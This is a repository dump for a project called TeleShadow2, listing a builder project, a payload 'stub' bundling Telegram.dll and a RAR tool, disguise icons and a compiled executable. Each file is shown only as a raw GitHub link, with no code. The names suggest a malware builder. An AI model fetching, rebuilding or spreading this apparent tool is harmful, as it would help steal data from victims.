├── Builder ├── NULL.sln ├── NULL.v12.suo └── NULL │ ├── 2.ico │ ├── AboutBox.Designer.cs │ ├── AboutBox.cs │ ├── AboutBox.resx │ ├── Core │ ├── Encode │ │ └── Encode.cs │ └── Icon │ │ └── Icon.cs │ ├── Main.Designer.cs │ ├── Main.cs │ ├── Main.resx │ ├── Program.cs │ ├── Properties │ ├── AssemblyInfo.cs │ ├── Resources.Designer.cs │ ├── Resources.resx │ ├── Settings.Designer.cs │ └── Settings.settings │ ├── Resources │ ├── 1.jpg │ ├── 3.bmp │ ├── Marlett_1.png │ └── Marlett_2.png │ ├── TeleShadow.csproj │ └── app.config ├── README.md ├── Release ├── Icon │ ├── SAR1.ico │ ├── SAR2.ico │ ├── SAR3.ico │ ├── SAR4.ico │ ├── SAR5.ico │ ├── SAR6.ico │ ├── SAR7.ico │ └── SAR8.ico ├── TeleShadow.exe └── stubx ├── Screen.jpg └── Stub ├── Teleshadow Paylaod V2.0.sln ├── Teleshadow Paylaod V2.0.v12.suo └── Teleshadow Paylaod V2.0 ├── App.config ├── Program.cs ├── Properties ├── AssemblyInfo.cs ├── Resources.Designer.cs └── Resources.resx ├── Resources └── rar_cli.exe ├── System.Windows.Forms.dll ├── Telegram.dll └── Teleshadow Paylaod V2.0.csproj /Builder/NULL.sln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Builder/NULL.sln -------------------------------------------------------------------------------- /Builder/NULL.v12.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Builder/NULL.v12.suo -------------------------------------------------------------------------------- /Builder/NULL/2.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Builder/NULL/2.ico -------------------------------------------------------------------------------- /Builder/NULL/AboutBox.Designer.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Builder/NULL/AboutBox.Designer.cs -------------------------------------------------------------------------------- /Builder/NULL/AboutBox.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Builder/NULL/AboutBox.cs -------------------------------------------------------------------------------- /Builder/NULL/AboutBox.resx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Builder/NULL/AboutBox.resx -------------------------------------------------------------------------------- /Builder/NULL/Core/Encode/Encode.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Builder/NULL/Core/Encode/Encode.cs -------------------------------------------------------------------------------- /Builder/NULL/Core/Icon/Icon.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Builder/NULL/Core/Icon/Icon.cs -------------------------------------------------------------------------------- /Builder/NULL/Main.Designer.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Builder/NULL/Main.Designer.cs -------------------------------------------------------------------------------- /Builder/NULL/Main.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Builder/NULL/Main.cs -------------------------------------------------------------------------------- /Builder/NULL/Main.resx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Builder/NULL/Main.resx -------------------------------------------------------------------------------- /Builder/NULL/Program.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Builder/NULL/Program.cs -------------------------------------------------------------------------------- /Builder/NULL/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Builder/NULL/Properties/AssemblyInfo.cs -------------------------------------------------------------------------------- /Builder/NULL/Properties/Resources.Designer.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Builder/NULL/Properties/Resources.Designer.cs -------------------------------------------------------------------------------- /Builder/NULL/Properties/Resources.resx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Builder/NULL/Properties/Resources.resx -------------------------------------------------------------------------------- /Builder/NULL/Properties/Settings.Designer.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Builder/NULL/Properties/Settings.Designer.cs -------------------------------------------------------------------------------- /Builder/NULL/Properties/Settings.settings: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Builder/NULL/Properties/Settings.settings -------------------------------------------------------------------------------- /Builder/NULL/Resources/1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Builder/NULL/Resources/1.jpg -------------------------------------------------------------------------------- /Builder/NULL/Resources/3.bmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Builder/NULL/Resources/3.bmp -------------------------------------------------------------------------------- /Builder/NULL/Resources/Marlett_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Builder/NULL/Resources/Marlett_1.png -------------------------------------------------------------------------------- /Builder/NULL/Resources/Marlett_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Builder/NULL/Resources/Marlett_2.png -------------------------------------------------------------------------------- /Builder/NULL/TeleShadow.csproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Builder/NULL/TeleShadow.csproj -------------------------------------------------------------------------------- /Builder/NULL/app.config: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Builder/NULL/app.config -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/README.md -------------------------------------------------------------------------------- /Release/Icon/SAR1.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Release/Icon/SAR1.ico -------------------------------------------------------------------------------- /Release/Icon/SAR2.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Release/Icon/SAR2.ico -------------------------------------------------------------------------------- /Release/Icon/SAR3.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Release/Icon/SAR3.ico -------------------------------------------------------------------------------- /Release/Icon/SAR4.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Release/Icon/SAR4.ico -------------------------------------------------------------------------------- /Release/Icon/SAR5.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Release/Icon/SAR5.ico -------------------------------------------------------------------------------- /Release/Icon/SAR6.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Release/Icon/SAR6.ico -------------------------------------------------------------------------------- /Release/Icon/SAR7.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Release/Icon/SAR7.ico -------------------------------------------------------------------------------- /Release/Icon/SAR8.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Release/Icon/SAR8.ico -------------------------------------------------------------------------------- /Release/TeleShadow.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Release/TeleShadow.exe -------------------------------------------------------------------------------- /Release/stubx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Release/stubx -------------------------------------------------------------------------------- /Screen.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Screen.jpg -------------------------------------------------------------------------------- /Stub/Teleshadow Paylaod V2.0.sln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Stub/Teleshadow Paylaod V2.0.sln -------------------------------------------------------------------------------- /Stub/Teleshadow Paylaod V2.0.v12.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Stub/Teleshadow Paylaod V2.0.v12.suo -------------------------------------------------------------------------------- /Stub/Teleshadow Paylaod V2.0/App.config: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Stub/Teleshadow Paylaod V2.0/App.config -------------------------------------------------------------------------------- /Stub/Teleshadow Paylaod V2.0/Program.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Stub/Teleshadow Paylaod V2.0/Program.cs -------------------------------------------------------------------------------- /Stub/Teleshadow Paylaod V2.0/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Stub/Teleshadow Paylaod V2.0/Properties/AssemblyInfo.cs -------------------------------------------------------------------------------- /Stub/Teleshadow Paylaod V2.0/Properties/Resources.Designer.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Stub/Teleshadow Paylaod V2.0/Properties/Resources.Designer.cs -------------------------------------------------------------------------------- /Stub/Teleshadow Paylaod V2.0/Properties/Resources.resx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Stub/Teleshadow Paylaod V2.0/Properties/Resources.resx -------------------------------------------------------------------------------- /Stub/Teleshadow Paylaod V2.0/Resources/rar_cli.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Stub/Teleshadow Paylaod V2.0/Resources/rar_cli.exe -------------------------------------------------------------------------------- /Stub/Teleshadow Paylaod V2.0/System.Windows.Forms.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Stub/Teleshadow Paylaod V2.0/System.Windows.Forms.dll -------------------------------------------------------------------------------- /Stub/Teleshadow Paylaod V2.0/Telegram.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Stub/Teleshadow Paylaod V2.0/Telegram.dll -------------------------------------------------------------------------------- /Stub/Teleshadow Paylaod V2.0/Teleshadow Paylaod V2.0.csproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParsingTeam/TeleShadow2/HEAD/Stub/Teleshadow Paylaod V2.0/Teleshadow Paylaod V2.0.csproj --------------------------------------------------------------------------------